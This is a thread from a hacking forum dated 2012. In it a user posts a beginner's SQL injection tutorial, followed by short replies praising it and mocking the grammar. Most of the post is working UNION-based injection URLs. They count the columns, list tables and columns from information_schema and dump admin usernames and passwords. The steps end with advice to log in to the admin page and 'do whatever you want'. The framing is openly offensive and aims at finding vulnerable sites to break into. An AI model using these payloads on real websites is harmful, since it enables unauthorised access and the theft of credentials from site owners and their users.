Tutorial [Tutorial] Blazer First Sql Injection Tutorial!!!!!

Tutorial [Tutorial] Blazer First Sql Injection Tutorial!!!!! - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: Tutorial [Tutorial] Blazer First Sql Injection Tutorial!!!!! (/Thread-Tutorial-Tutorial-Blazer-First-Sql-Injection-Tutorial)

[Tutorial] Blazer First Sql Injection Tutorial!!!!! - blazer15 - 12-13-2012

1. Find a vulnerable website. here is a example!

2.
http://www.site.com/index.php?=5'

Ps Biggrin

on't type error after after this (--)

3.
http://www.site.com/index.php?=5 order by 10-- error

http://www.site.com/index.php?=5 order by 9-- error

http://www.site.com/index.php?=5 order by 8-- No error
:cheers:

4. the site has 8 columns.

5. Do like below Smile

6.
http://www.site.com/index.php?=-5 union select 1,2,3,4,5,6,7,8--

7. This will show some numbers on the page lets say it is number 3 on the page.

8.Let's get some tables:
http://www.site.com/index.php?=-5 union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables--

9. You will see tables: check for anything like admin, username, user. I found admin and lets start harvesting Smile

10.Type this:
http://www.site.com/index.php?=-5 union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name=database()--

11.Now you have the table name and the name is admin that you finded before this.Now the columns that you will see right now is maybe Username or Password.

12. Soo to get the password and username from admin type this.

13.
http://www.site.com/index.php?=-5 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8 from admin

14. And press enter.

15. you will see this. username:password.
ps: the password can be plain text or in a hash Smile

16. now get admin page and login and do whatever you want.

17. creedits to blazer15. :cheers:

I tried my best! but i hope it will help you Smile

:blackhat:

RE: [Tutorial] Blazer First Sql Injection Tutorial!!!!! - Bannedshee - 12-13-2012

Great tutorial, i really need to learn more about SQLi, although please work on your grammar Smile

RE: [Tutorial] Blazer First Sql Injection Tutorial!!!!! - blazer15 - 12-13-2012

(12-13-2012, 02:06 AM)Cyber-Savage Wrote: Great tutorial, i really need to learn more about SQLi, although please work on your grammar

Thank you very much Smile

RE: [Tutorial] Blazer First Sql Injection Tutorial!!!!! - Kinanizer - 12-13-2012

Decent TUT, looks like you put it together in under 30 mins though. Might want to make it more of a walk-through.